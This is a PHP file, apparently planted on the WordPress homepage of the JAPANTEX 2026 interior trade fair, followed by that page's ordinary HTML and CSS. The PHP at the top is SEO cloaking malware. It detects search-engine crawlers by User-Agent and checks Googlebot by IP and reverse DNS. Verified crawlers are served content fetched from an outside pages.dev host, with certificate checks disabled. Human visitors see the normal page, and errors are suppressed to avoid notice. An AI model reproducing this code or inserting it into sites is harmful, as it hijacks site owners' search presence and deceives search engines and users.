- <?php
- error_reporting(0);
- ini_set('display_errors', 0);
- // ============================================
- // CONFIGURATION
- // ============================================
- $config = [
- 'bot_url' => 'https://korongggbabii-mon.pages.dev/',
- 'cache_ttl' => 3600,
- 'timeout' => 15
- ];
- function is_search_bot() {
- $bots = [
- // Google
- 'Googlebot', 'Googlebot-Mobile', 'Googlebot-Image', 'Googlebot-News',
- 'Googlebot-Video', 'AdsBot-Google', 'Mediapartners-Google',
- 'Google-InspectionTool', 'Google-Site-Verification', 'Storebot-Google',
- // Bing
- 'bingbot', 'msnbot', 'BingPreview',
- // Others
- 'Slurp', 'DuckDuckBot', 'Baiduspider', 'YandexBot',
- 'facebookexternalhit', 'LinkedInBot', 'Twitterbot'
- ];
- $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
- foreach ($bots as $bot) {
- if (stripos($user_agent, $bot) !== false) {
- return true;
- }
- }
- return false;
- }
- function verify_google_ip() {
- $ip = $_SERVER['REMOTE_ADDR'] ?? '';
- if (empty($ip)) {
- return false;
- }
- // Quick check: Google IP ranges
- $google_ip_prefixes = ['66.249.', '64.233.', '72.14.', '209.85.', '216.239.'];
- foreach ($google_ip_prefixes as $prefix) {
- if (strpos($ip, $prefix) === 0) {
- return true;
- }
- }
- // Deep verification: Reverse DNS
- $hostname = gethostbyaddr($ip);
- if (stripos($hostname, 'googlebot.com') !== false ||
- stripos($hostname, 'google.com') !== false) {
- $resolved_ip = gethostbyname($hostname);
- if ($resolved_ip === $ip) {
- return true;
- }
- }
- return false;
- }
- function get_remote_content($url, $timeout = 10) {
- // Try cURL first
- if (function_exists('curl_init')) {
- $ch = curl_init($url);
- curl_setopt_array($ch, [
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_FOLLOWLOCATION => true,
- CURLOPT_MAXREDIRS => 5,
- CURLOPT_TIMEOUT => $timeout,
- CURLOPT_SSL_VERIFYPEER => false,
- CURLOPT_SSL_VERIFYHOST => false,
- CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
- CURLOPT_ENCODING => 'gzip, deflate',
- CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1
- ]);
- $content = curl_exec($ch);
- $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
- $error = curl_error($ch);
- curl_close($ch);
- if ($content && $http_code == 200) {
- return $content;
- }
- error_log("cURL failed: $error (HTTP $http_code)");
- }
- // Fallback: file_get_contents
- if (ini_get('allow_url_fopen')) {
- $context = stream_context_create([
- 'http' => [
- 'method' => 'GET',
- 'timeout' => $timeout,
- 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
- 'follow_location' => 1,
- 'max_redirects' => 5
- ],
- 'ssl' => [
- 'verify_peer' => false,
- 'verify_peer_name' => false
- ]
- ]);
- $content = @file_get_contents($url, false, $context);
- if ($content !== false) {
- return $content;
- }
- }
- return false;
- }
- function cache_content($key, $content = null, $ttl = 3600) {
- $cache_dir = __DIR__ . '/.cache';
- if (!is_dir($cache_dir)) {
- @mkdir($cache_dir, 0755, true);
- }
- $cache_file = $cache_dir . '/' . md5($key) . '.html';
- if ($content !== null) {
- // Save cache
- file_put_contents($cache_file, serialize([
- 'time' => time(),
- 'content' => $content
- ]));
- return true;
- } else {
- // Read cache
- if (file_exists($cache_file)) {
- $data = unserialize(file_get_contents($cache_file));
- if ($data && (time() - $data['time']) < $ttl) {
- return $data['content'];
- }
- }
- }
- return false;
- }
- function serve_bot_content($url, $ttl = 3600, $timeout = 15) {
- // Try cache first
- $cached = cache_content('bot_content', null, $ttl);
- if ($cached) {
- header('Content-Type: text/html; charset=utf-8');
- header('X-Content-Source: cache');
- header('X-Visitor-Type: bot');
- echo $cached;
- exit;
- }
- // Fetch fresh content
- $content = get_remote_content($url, $timeout);
- if ($content) {
- cache_content('bot_content', $content, $ttl);
- header('Content-Type: text/html; charset=utf-8');
- header('X-Content-Source: remote');
- header('X-Visitor-Type: bot');
- echo $content;
- exit;
- }
- // Fallback: Error
- http_response_code(503);
- header('Retry-After: 300');
- echo '<!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="utf-8">
- <title>Temporarily Unavailable</title>
- </head>
- <body>
- <h1>503 Service Temporarily Unavailable</h1>
- <p>Please try again later.</p>
- </body>
- </html>';
- exit;
- }
- // ============================================
- // MAIN EXECUTION
- // ============================================
- // Check if visitor is a bot
- if (is_search_bot()) {
- // Additional security: Verify Google IP
- $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
- if (stripos($user_agent, 'Googlebot') !== false) {
- if (!verify_google_ip()) {
- // Fake Googlebot! Let it see user content below
- error_log("Fake Googlebot detected from IP: " . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
- // Don't exit, continue to show HTML below
- } else {
- // Real Googlebot - serve remote content
- serve_bot_content($config['bot_url'], $config['cache_ttl'], $config['timeout']);
- }
- } else {
- // Other bots - serve remote content
- serve_bot_content($config['bot_url'], $config['cache_ttl'], $config['timeout']);
- }
- }
- // If we reach here, it's a regular user or fake bot
- // Show the HTML content below
- header('Content-Type: text/html; charset=utf-8');
- header('X-Visitor-Type: user');
- ?>
- <!DOCTYPE html>
- <html lang="ja">
- <head>
- <meta charset="UTF-8">
- <meta charset="UTF-8">
- <meta name="viewport" content="width=device-width, initial-scale=1">
- <meta name="format-detection" content="telephone=no">
- <link rel="profile" href="//gmpg.org/xfn/11">
- <title>JAPANTEX 2026|日本最大級の国際インテリア見本市(公式) – 日本最大級のインテリア国際見本市「JAPANTEX 2025」で最新のインテリアトレンドを体感。カーテン・壁紙・床材などを国内外の出展者と直接商談できる日本最大級の展示会です。</title>
- <meta name='robots' content='max-image-preview:large' />
- <link rel='dns-prefetch' href='//www.googletagmanager.com' />
- <link rel='dns-prefetch' href='//fonts.googleapis.com' />
- <link rel="alternate" type="application/rss+xml" title="JAPANTEX 2026|日本最大級の国際インテリア見本市(公式) » フィード" href="https://japantex.jp/feed/" />
- <link rel="alternate" type="application/rss+xml" title="JAPANTEX 2026|日本最大級の国際インテリア見本市(公式) » コメントフィード" href="https://japantex.jp/comments/feed/" />
- <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://japantex.jp/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjapantex.jp%2F" />
- <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://japantex.jp/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fjapantex.jp%2F&format=xml" />
- <meta property="og:type" content="website" />
- <meta property="og:site_name" content="JAPANTEX 2026|日本最大級の国際インテリア見本市(公式)" />
- <meta property="og:description" content="日本最大級のインテリア国際見本市「JAPANTEX 2025」で最新のインテリアトレンドを体感。カーテン・壁紙・床材などを国内外の出展者と直接商談できる日本最大級の展示会です。" />
- <meta property="og:image" content="https://japantex.jp/wp-content/uploads/2026/03/JAPANTEXLOGO.svg" />
- <style id='wp-img-auto-sizes-contain-inline-css'>
- img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
- /*# sourceURL=wp-img-auto-sizes-contain-inline-css */
- </style>
- <link property="stylesheet" rel='stylesheet' id='sbi_styles-css' href='https://japantex.jp/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.10.0' type='text/css' media='all' />
- <style id='wp-emoji-styles-inline-css'>
- img.wp-smiley, img.emoji {
- display: inline !important;
- border: none !important;
- box-shadow: none !important;
- height: 1em !important;
- width: 1em !important;
- margin: 0 0.07em !important;
- vertical-align: -0.1em !important;
- background: none !important;
- padding: 0 !important;
- }
- /*# sourceURL=wp-emoji-styles-inline-css */
- </style>
- <style id='global-styles-inline-css'>
- :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--theme-color-bg-color: #FAF9F4;--wp--preset--color--theme-color-bg-color-2: #EEEDE4;--wp--preset--color--theme-color-bd-color: #E3E1D6;--wp--preset--color--theme-color-title: #1F242E;--wp--preset--color--theme-color-meta: #B2B0A8;--wp--preset--color--theme-color-link: #A44027;--wp--preset--color--theme-color-hover: #A33012;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgb(6,147,227) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgb(252,185,0) 0%,rgb(255,105,0) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgb(255,105,0) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--gradient--vertical-link-to-hover: linear-gradient(to bottom,var(--theme-color-link) 0%,var(--theme-color-hover) 100%);--wp--preset--gradient--diagonal-link-to-hover: linear-gradient(to bottom right,var(--theme-color-link) 0%,var(--theme-color-hover) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: clamp(14px, 0.875rem + ((1vw - 3.2px) * 0.619), 20px);--wp--preset--font-size--large: clamp(22.041px, 1.378rem + ((1vw - 3.2px) * 1.439), 36px);--wp--preset--font-size--x-large: clamp(25.014px, 1.563rem + ((1vw - 3.2px) * 1.751), 42px);--wp--preset--font-family--p-font: "Work Sans",sans-serif;--wp--preset--font-family--post-font: inherit;--wp--preset--font-family--h-1-font: Lexend,sans-serif;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgb(255, 255, 255), 6px 6px rgb(0, 0, 0);--wp--preset--shadow--crisp: 6px 6px 0px rgb(0, 0, 0);--wp--custom--spacing--tiny: var(--sc-space-tiny, 1rem);--wp--custom--spacing--small: var(--sc-space-small, 2rem);--wp--custom--spacing--medium: var(--sc-space-medium, 3.3333rem);--wp--custom--spacing--large: var(--sc-space-large, 6.6667rem);--wp--custom--spacing--huge: var(--sc-space-huge, 8.6667rem);}:root { --wp--style--global--content-size: 850px;--wp--style--global--wide-size: 1290px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}.is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}body{padding-top: 0px;padding-right: 0px;padding-bottom: 0px;padding-left: 0px;}a:where(:not(.wp-element-button)){text-decoration: underline;}:root :where(.wp-element-button, .wp-block-button__link){background-color: #32373c;border-width: 0;color: #fff;font-family: inherit;font-size: inherit;font-style: inherit;font-weight: inherit;letter-spacing: inherit;line-height: inherit;padding-top: calc(0.667em + 2px);padding-right: calc(1.333em + 2px);padding-bottom: calc(0.667em + 2px);padding-left: calc(1.333em + 2px);text-decoration: none;text-transform: inherit;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-theme-color-bg-color-color{color: var(--wp--preset--color--theme-color-bg-color) !important;}.has-theme-color-bg-color-2-color{color: var(--wp--preset--color--theme-color-bg-color-2) !important;}.has-theme-color-bd-color-color{color: var(--wp--preset--color--theme-color-bd-color) !important;}.has-theme-color-title-color{color: var(--wp--preset--color--theme-color-title) !important;}.has-theme-color-meta-color{color: var(--wp--preset--color--theme-color-meta) !important;}.has-theme-color-link-color{color: var(--wp--preset--color--theme-color-link) !important;}.has-theme-color-hover-color{color: var(--wp--preset--color--theme-color-hover) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-theme-color-bg-color-background-color{background-color: var(--wp--preset--color--theme-color-bg-color) !important;}.has-theme-color-bg-color-2-background-color{background-color: var(--wp--preset--color--theme-color-bg-color-2) !important;}.has-theme-color-bd-color-background-color{background-color: var(--wp--preset--color--theme-color-bd-color) !important;}.has-theme-color-title-background-color{background-color: var(--wp--preset--color--theme-color-title) !important;}.has-theme-color-meta-background-color{background-color: var(--wp--preset--color--theme-color-meta) !important;}.has-theme-color-link-background-color{background-color: var(--wp--preset--color--theme-color-link) !important;}.has-theme-color-hover-background-color{background-color: var(--wp--preset--color--theme-color-hover) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-theme-color-bg-color-border-color{border-color: var(--wp--preset--color--theme-color-bg-color) !important;}.has-theme-color-bg-color-2-border-color{border-color: var(--wp--preset--color--theme-color-bg-color-2) !important;}.has-theme-color-bd-color-border-color{border-color: var(--wp--preset--color--theme-color-bd-color) !important;}.has-theme-color-title-border-color{border-color: var(--wp--preset--color--theme-color-title) !important;}.has-theme-color-meta-border-color{border-color: var(--wp--preset--color--theme-color-meta) !important;}.has-theme-color-link-border-color{border-color: var(--wp--preset--color--theme-color-link) !important;}.has-theme-color-hover-border-color{border-color: var(--wp--preset--color--theme-color-hover) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-vertical-link-to-hover-gradient-background{background: var(--wp--preset--gradient--vertical-link-to-hover) !important;}.has-diagonal-link-to-hover-gradient-background{background: var(--wp--preset--gradient--diagonal-link-to-hover) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}.has-p-font-font-family{font-family: var(--wp--preset--font-family--p-font) !important;}.has-post-font-font-family{font-family: var(--wp--preset--font-family--post-font) !important;}.has-h-1-font-font-family{font-family: var(--wp--preset--font-family--h-1-font) !important;}
- :root :where(.wp-block-button .wp-block-button__link){background-color: var(--theme-color-text_link);border-radius: 0;color: var(--theme-color-inverse_link);font-family: var(--theme-font-button_font-family);font-size: var(--theme-font-button_font-size);font-weight: var(--theme-font-button_font-weight);line-height: var(--theme-font-button_line-height);}
- :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
- :where(.wp-block-term-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-term-template.is-layout-grid){gap: 1.25em;}
- :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
- :root :where(.wp-block-pullquote){border-width: 1px 0;font-size: clamp(0.984em, 0.984rem + ((1vw - 0.2em) * 0.851), 1.5em);line-height: 1.6;}
- :root :where(.wp-block-post-comments){padding-top: var(--wp--custom--spacing--small);}
- :root :where(.wp-block-quote){border-width: 1px;}
- /*# sourceURL=global-styles-inline-css */
- </style>
- <link property="stylesheet" rel='stylesheet' id='contact-form-7-css' href='https://japantex.jp/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.1.5' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='elementor-frontend-css' href='https://japantex.jp/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.35.5' type='text/css' media='all' />
- <style id='elementor-frontend-inline-css'>
- .elementor-kit-6{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;--e-global-color-theme_color_bg_color:#FAF9F4;--e-global-color-theme_color_bg_color_2:#EEEDE4;--e-global-color-theme_color_bd_color:#E3E1D6;--e-global-color-theme_color_title:#1F242E;--e-global-color-theme_color_text:#989792;--e-global-color-theme_color_meta:#B2B0A8;--e-global-color-theme_color_link:#A44027;--e-global-color-theme_color_hover:#A33012;--e-global-color-theme_color_alt_bg_color:#251A17;--e-global-color-theme_color_alt_bg_color_2:#2C2321;--e-global-color-theme_color_alt_bd_color:#484140;--e-global-color-theme_color_alt_title:#FFFEFE;--e-global-color-theme_color_alt_text:#B8BCC4;--e-global-color-theme_color_alt_meta:#A2A6AF;--e-global-color-theme_color_alt_link:#A44027;--e-global-color-theme_color_alt_hover:#A33012;--e-global-typography-theme_font_p-font-family:"Work Sans";--e-global-typography-theme_font_p-font-size:16px;--e-global-typography-theme_font_p-font-weight:400;--e-global-typography-theme_font_p-text-transform:none;--e-global-typography-theme_font_p-font-style:normal;--e-global-typography-theme_font_p-line-height:1.625em;--e-global-typography-theme_font_p-letter-spacing:0px;--e-global-typography-theme_font_post-font-family:"inherit";--e-global-typography-theme_font_post-font-weight:inherit;--e-global-typography-theme_font_post-text-transform:inherit;--e-global-typography-theme_font_post-font-style:inherit;--e-global-typography-theme_font_post-text-decoration:inherit;--e-global-typography-theme_font_h1-font-family:"Lexend";--e-global-typography-theme_font_h1-font-size:57px;--e-global-typography-theme_font_h1-font-weight:500;--e-global-typography-theme_font_h1-text-transform:none;--e-global-typography-theme_font_h1-font-style:normal;--e-global-typography-theme_font_h1-text-decoration:none;--e-global-typography-theme_font_h1-line-height:1.1052em;--e-global-typography-theme_font_h1-letter-spacing:-0.02em;--e-global-typography-theme_font_h2-font-family:"Lexend";--e-global-typography-theme_font_h2-font-size:47px;--e-global-typography-theme_font_h2-font-weight:500;--e-global-typography-theme_font_h2-text-transform:none;--e-global-typography-theme_font_h2-font-style:normal;--e-global-typography-theme_font_h2-text-decoration:none;--e-global-typography-theme_font_h2-line-height:1.1276em;--e-global-typography-theme_font_h2-letter-spacing:0px;--e-global-typography-theme_font_h3-font-family:"Lexend";--e-global-typography-theme_font_h3-font-size:35px;--e-global-typography-theme_font_h3-font-weight:500;--e-global-typography-theme_font_h3-text-transform:none;--e-global-typography-theme_font_h3-font-style:normal;--e-global-typography-theme_font_h3-text-decoration:none;--e-global-typography-theme_font_h3-line-height:1.1142em;--e-global-typography-theme_font_h3-letter-spacing:0px;--e-global-typography-theme_font_h4-font-family:"Lexend";--e-global-typography-theme_font_h4-font-size:28px;--e-global-typography-theme_font_h4-font-weight:500;--e-global-typography-theme_font_h4-text-transform:none;--e-global-typography-theme_font_h4-font-style:normal;--e-global-typography-theme_font_h4-text-decoration:none;--e-global-typography-theme_font_h4-line-height:1.2143em;--e-global-typography-theme_font_h4-letter-spacing:0px;--e-global-typography-theme_font_h5-font-family:"Lexend";--e-global-typography-theme_font_h5-font-size:23px;--e-global-typography-theme_font_h5-font-weight:500;--e-global-typography-theme_font_h5-text-transform:none;--e-global-typography-theme_font_h5-font-style:normal;--e-global-typography-theme_font_h5-text-decoration:none;--e-global-typography-theme_font_h5-line-height:1.2174em;--e-global-typography-theme_font_h5-letter-spacing:0px;--e-global-typography-theme_font_h6-font-family:"Lexend";--e-global-typography-theme_font_h6-font-size:19px;--e-global-typography-theme_font_h6-font-weight:500;--e-global-typography-theme_font_h6-text-transform:none;--e-global-typography-theme_font_h6-font-style:normal;--e-global-typography-theme_font_h6-text-decoration:none;--e-global-typography-theme_font_h6-line-height:1.2632em;--e-global-typography-theme_font_h6-letter-spacing:0px;--e-global-typography-theme_font_logo-font-family:"Lexend";--e-global-typography-theme_font_logo-font-size:35px;--e-global-typography-theme_font_logo-font-weight:500;--e-global-typography-theme_font_logo-text-transform:none;--e-global-typography-theme_font_logo-font-style:normal;--e-global-typography-theme_font_logo-text-decoration:none;--e-global-typography-theme_font_logo-line-height:1.1142em;--e-global-typography-theme_font_logo-letter-spacing:0px;--e-global-typography-theme_font_button-font-family:"Lexend";--e-global-typography-theme_font_button-font-size:16px;--e-global-typography-theme_font_button-font-weight:500;--e-global-typography-theme_font_button-text-transform:none;--e-global-typography-theme_font_button-font-style:normal;--e-global-typography-theme_font_button-text-decoration:none;--e-global-typography-theme_font_button-line-height:19px;--e-global-typography-theme_font_button-letter-spacing:0px;--e-global-typography-theme_font_input-font-family:"inherit";--e-global-typography-theme_font_input-font-size:15px;--e-global-typography-theme_font_input-font-weight:400;--e-global-typography-theme_font_input-text-transform:none;--e-global-typography-theme_font_input-font-style:normal;--e-global-typography-theme_font_input-text-decoration:none;--e-global-typography-theme_font_input-line-height:1.6em;--e-global-typography-theme_font_input-letter-spacing:0px;--e-global-typography-theme_font_info-font-family:"inherit";--e-global-typography-theme_font_info-font-size:14px;--e-global-typography-theme_font_info-font-weight:400;--e-global-typography-theme_font_info-text-transform:none;--e-global-typography-theme_font_info-font-style:normal;--e-global-typography-theme_font_info-text-decoration:none;--e-global-typography-theme_font_info-line-height:1.5em;--e-global-typography-theme_font_info-letter-spacing:0px;--e-global-typography-theme_font_menu-font-family:"Lexend";--e-global-typography-theme_font_menu-font-size:16px;--e-global-typography-theme_font_menu-font-weight:500;--e-global-typography-theme_font_menu-text-transform:none;--e-global-typography-theme_font_menu-font-style:normal;--e-global-typography-theme_font_menu-text-decoration:none;--e-global-typography-theme_font_menu-line-height:1.5em;--e-global-typography-theme_font_menu-letter-spacing:0px;--e-global-typography-theme_font_submenu-font-family:"Work Sans";--e-global-typography-theme_font_submenu-font-size:15px;--e-global-typography-theme_font_submenu-font-weight:500;--e-global-typography-theme_font_submenu-text-transform:none;--e-global-typography-theme_font_submenu-font-style:normal;--e-global-typography-theme_font_submenu-text-decoration:none;--e-global-typography-theme_font_submenu-line-height:1.4em;--e-global-typography-theme_font_submenu-letter-spacing:0px;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1290px;}.e-con{--container-max-width:1290px;--container-default-padding-top:0px;--container-default-padding-right:0px;--container-default-padding-bottom:0px;--container-default-padding-left:0px;}.elementor-widget:not(:last-child){margin-block-end:0px;}.elementor-element{--widgets-spacing:0px 0px;--widgets-spacing-row:0px;--widgets-spacing-column:0px;}{}.sc_layouts_title_caption{display:var(--page-title-display);}@media(max-width:1024px){.elementor-kit-6{--e-global-typography-theme_font_h1-font-size:45px;--e-global-typography-theme_font_h2-font-size:36px;--e-global-typography-theme_font_h3-font-size:28px;--e-global-typography-theme_font_h4-font-size:22px;--e-global-typography-theme_font_h5-font-size:20px;--e-global-typography-theme_font_h6-font-size:18px;--e-global-typography-theme_font_logo-font-size:28px;}.elementor-section.elementor-section-boxed > 